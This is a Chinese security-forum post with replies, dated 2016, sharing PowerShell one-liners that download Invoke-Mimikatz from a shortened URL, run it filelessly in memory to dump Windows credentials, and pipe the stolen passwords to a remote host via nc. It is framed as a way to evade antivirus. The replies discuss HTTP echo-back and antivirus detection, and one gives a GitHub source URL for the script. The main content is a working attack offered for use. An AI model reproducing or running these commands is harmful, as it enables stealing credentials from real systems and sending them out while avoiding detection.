powershell加载mimikatz 抓密码 (无文件，躲过杀软，可以nc回显) 20160715

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" | nc 192.168.1.1 4444 

其实我觉得可以考虑http回显。 

然后查看http日志。 

 

视频下载:https://yunpan.cn/cB5T9cAP5QF9T  提取码：97fb

收藏 感谢(0)

分享到： 0

6 个回复

1. 1# F1uYu4n   |  2016-07-15 10:38

   windows一般哪有nc给你用

2. 2# 陆由乙 (admin'OR'a'='a)   |  2016-07-15 11:11

   @F1uYu4n 额，那就http回显。

3. 3# Hogns (这家伙还没有成为任何领域的领主)   |  2016-07-15 12:09

   这个脚本这几天刚被杀。。一上传就被干了。
   杀软：麦咖啡

4. 4# 娃哈哈 (科学家)   |  2016-07-15 13:20

   无法连接到远程服务器

5. 5# YY-2012 (#)(#)   |  2016-07-15 13:20

   可以

6. 6#

   回复此人  感谢

   陆由乙 (admin'OR'a'='a)   |  2016-07-15 13:26

   @娃哈哈 https://raw.githubusercontent.com/Tu-tu-tu/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 zg